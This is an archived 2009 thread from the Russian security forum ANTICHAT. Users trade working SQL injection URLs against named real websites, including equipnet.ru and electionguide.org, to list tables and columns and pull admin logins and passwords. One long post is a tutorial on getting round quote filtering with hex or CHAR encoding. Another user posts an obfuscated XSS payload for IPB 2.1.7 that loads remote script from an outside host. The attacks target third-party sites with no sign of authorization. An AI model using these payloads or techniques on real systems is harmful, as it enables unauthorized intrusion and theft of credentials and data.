ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.01.2009, 11:27
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Вопрос насчет скули..
http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+102,1--
вижу, что есть таблица users.
пытаюсь получить столбцы, но не выхходит =(
http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME='users'--
помогите, пожалуйста - тут чистый интерес.
|
|
|
11.01.2009, 11:33
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
wildshaman
Кавычки не жрёт
Зехекси users и перебирай.
http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME=0x7573657273--
выводит нормально.
|
|
|
|
11.01.2009, 11:37
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от ThreeD
wildshaman
Кавычки не жрёт
Зехекси users и перебирай.
http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME=0x7573657273--
выводит нормально.
Спс, я б сам не догадался)
|
|
|
|
11.01.2009, 11:50
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Не подскажите нуда XSS вставлять в этом коде?
Или путь до JS
XSS для IPB v2.1.7
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =[/snapback].gif[/img]
Если ставлю вместо
src=/http:xxdaim.ruxmonzterxforum/
вот такое
src=/http:xxhost.ruxmonzterxscriptxmonzterxjs.js/
то всё ок но после перехода по картинке (которая образованна XSS) выходит сообщение:
"Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова."
также пробовал вставить туда
Ошибка таже...
Последний раз редактировалось Byrger; 11.01.2009 в 12:14..
|
|
|
|
11.01.2009, 12:47
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Octave_Parango
пытаюсь вывести данные из колонки admin:
=-345+union+select+1,2,concat_ws(0x3a,admin_user,adm in_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+admin--
Ничего не выводит. Пробую лимит, тоже самое. Хэксил - пусто.
Пишу:
=-345+union+select+1,2,count(*),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+admin--
Выводит число 149
Гоняем одни и те-же вопросы по кругу.
Господа, вывод это не мёд (вроде есть, и сразу нет), он или есть, или нет.
Если Вы видите вывод цифры, то он есть 100%, а невозможность вывода данных может быть только в нескольких случаях
1 Таблица пустая
Проверяется count(*)
union+select+1,2,count(*),4+from+user
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='user'
Если ковычки слешируются, перевести название таблицы/колонки в hex или в CHAR, кому как нравится
Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
union+select+1,table_rows+from+information_schema. tables+where+table_name=0x7573657273
для CHAR так:
union+select+1,table_rows+from+information_schema. tables+where+table_name=char(117,115,101,114,115)
Как видим обошлись без ковычек (сдесь table_name=users)
Некоторые индивидумы умудряются загонять в хекс или чар вместе с ковычками, тоесть так 'users'=27757365727327, так делать ненадо, я Вас умоляю )
Внимание, операторы, функции, и т.д переводить в hex или char нельзя(точнее, переводить то можно, но база Вас не поймёт ))
2 Таблица в другой базе
В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт
Проверяем(5 ветка) :
table_schema+from+information_schema.tables+where+ table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна
union+select+1,2,count(*),4+from+base.user (по аналогии с mysql.user)
3 Несоответствие кодировки
Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов:
cast(Version()+as+binary)
CONVERT(Version(),binary)
convert(version()+using+latin1)
Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке
aes_decrypt(aes_encrypt(Version(),1),1)
unhex(hex(version()))
4 Несоответствие типа данных
MySql к типам данных лоялен, а вот другие базы нет.Если база не mysql, читаем статьи по своей базе и приводим данные к нужному типу.
5 Закрыт доступ к таблице\базе
Опять-же, в mysql нельзя ограничить доступ к таблице, (можно только к базе), а в некоторых других базах можно
*Все примеры даны для mysql , в других базах другой синтаксис(читаем статьи)
Это основные причины невозможности вывода данных, которые решат 99% ваших вопросов.
|
|
|
|
11.01.2009, 13:04
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
jokester
Молодец конечно, за старания +, но дело в том, что сейчас твой пост в следующей паре затеряется и все вопросы начнут прогонять по кругу.Одни и те же.
ЛЮДИ, читайте тему! На любой ваш вопрос здесь 99% уже есть ответ, и не один!
На банальные вопросы в скором времени вам никто отвечать не будет, будете обижаться.Включайте мозг, и платите налоги =)
|
|
|
|
11.01.2009, 13:19
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Вот вопрсоег.
http://www.electionguide.org/country-news.php?ID=208+GROUP+BY+8+-- - ошибка не выводится, значит столбцов 8.
Делаю запрос http://www.electionguide.org/country-news.php?ID=208+UNION+SELECT+1,2,3,4,5,6,7,8+--
А мне пишет:
Query Error: The used SELECT statements have a different number of columns
Как будто количество неверно...
|
|
|
|
11.01.2009, 13:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Потому что там вот такая ошибка идет:
Код:
http://www.electionguide.org/country-news.php?ID=208+order+by+10--
Query Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY news_items.news_date DESC' at line 9
SQL: SELECT news_items.id, news_title, news_date, rss_title, IF(ext_id>0, news_link, CONCAT('http://www.electionguide.org/country-news.php?ID=',country.id,'#anchor_', news_items.id)) as news_link, IF(ext_id>0, external_news.rss_title, 'ElectionGuide') as news_source, news_content, ext_id FROM news_items LEFT JOIN country on country.id=news_items.country LEFT JOIN external_news ON external_news.id=news_items.ext_id WHERE news_items.is_active=1 AND news_items.country=208 order by 10-- ORDER BY news_items.news_date DESC
LEFT JOIN, или искать уязвимость в другом месте, или фактически blind sql-inj |
|
|
|
11.01.2009, 13:26
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Используй order+by
Нет ошибки:
Код:
http://www.electionguide.org/country-news.php?ID=208+order+by+50--
Ошибка:
Код:
http://www.electionguide.org/country-news.php?ID=208+order+by+51--
Итого:
Код:
http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--
Вывод в title.
Последний раз редактировалось R1dex; 11.01.2009 в 13:31..
|
|
|
|
11.01.2009, 13:31
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
R1dex
Опередил, там два запроса, в одном 8 полей во втором 50, это вывод из 2-го
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
